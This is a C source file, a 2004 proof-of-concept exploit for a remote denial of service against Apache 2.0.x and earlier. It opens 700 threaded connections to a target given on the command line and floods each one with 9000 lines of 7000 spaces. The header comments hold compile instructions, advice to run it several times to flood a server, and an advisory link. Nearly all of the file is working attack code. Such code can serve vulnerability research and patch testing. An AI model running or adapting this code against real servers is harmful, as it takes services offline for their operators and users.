/*
## [+] Apache/2.0.x and prior ( <= 2.0.x ) Remote Denial of Service (DoS)
##     Proof of Concept
##
## [-] A. Alejandro Hernandez Hernandez <nitrous@danitrous.org>
## [-] http://www.danitrous.org/
## [-] 13/nov/2004
##
## [*] Advisory: http://securitytracker.com/id?1012083
##
## How it works?:
## 700 Connections, and each one do:
##
## GET / HTTP/1.0\n
## [space]x7000\n
## [space]x7000\n
## [space]x7000\n
## ...
## 9000 times
## You can modify the TOTAL_THREADS variable (connections) and '6500'
##
## COMPILATION: $gcc apache_dos_xpl.c -o exploit -lpthread
##              The flag -lpthread or -pthread IS NECESSARY !
## NOTE: Launch the exploit many times. I launched the exploit 7 or 8 times to
##       fl00d my Apache/2.0.40 on Red Hat Linux 9.0 (2.6 GHz & 128 MB RAM)
##
## gr33tz: VF Labs (www.vulnfact.com), #null people, #cum people, CRAc, t0wn3r,
##         halo, dr_fdisk, flux, dex, ran, beavis...Tek brothers & systers ;)
*/

#include<stdio.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
#include<pthread.h>

#define TOTAL_THREADS	700
#define SPACES		7000

char payl0ad[SPACES];
struct hostent *hostname;

void *attack(void *no_used)
{
	struct sockaddr_in target;
	int sokete,cont,sent_bytes=0;
	char *request="GET / HTTP/1.0\n";

	target.sin_family=AF_INET;
	target.sin_addr=*((struct in_addr *)hostname->h_addr);
	target.sin_port=htons(80);
	bzero(&(target.sin_zero),8);

	if((sokete=socket(AF_INET,SOCK_STREAM,0))==-1)
	{
		perror("socket()");
		exit(-1);
	}

	if((connect(sokete,(struct sockaddr *)&target,sizeof(target)))==-1)
	{
		perror("connect()");
		exit(-1);
	}

	send(sokete,request,strlen(request),0);

	for(cont=1;cont<=9000;cont++)
		send(sokete,payl0ad,strlen(payl0ad),0);

	pthread_exit(NULL);
}

main(int argc,char **argv)
{
	pthread_t threads[TOTAL_THREADS];
	int aux,k;

	if(argc!=2)
	{
		fprintf(stdout,"Usage: %s <target>\n",argv[0]);
		exit(-1);
	}

	if((hostname=gethostbyname(argv[1]))==NULL)
	{
		perror("gethostbyname()");
		exit(0);
	}

	printf("\t------------------------------------------------\n");
	printf("\t Apache 2.0.x & < Remote DoS - Proof of Concept \n");
	printf("\t------------------------------------------------\n");
	printf("\nLaunching the Attack against %s...\n",argv[1]);

	memset(payl0ad,0x20,SPACES); /* 0x20 = Hex value of Blank Space = ' ' */
	payl0ad[SPACES-2]='\n';
	payl0ad[SPACES-1]='\0';

	for(k=0;k<TOTAL_THREADS;k++)
	{
		if((aux=pthread_create(&threads[k],NULL,attack,(void *)0)))
		{
			fprintf(stdout,"Error: pthread_create()\n\n");
			exit(-1);
		}
	}
}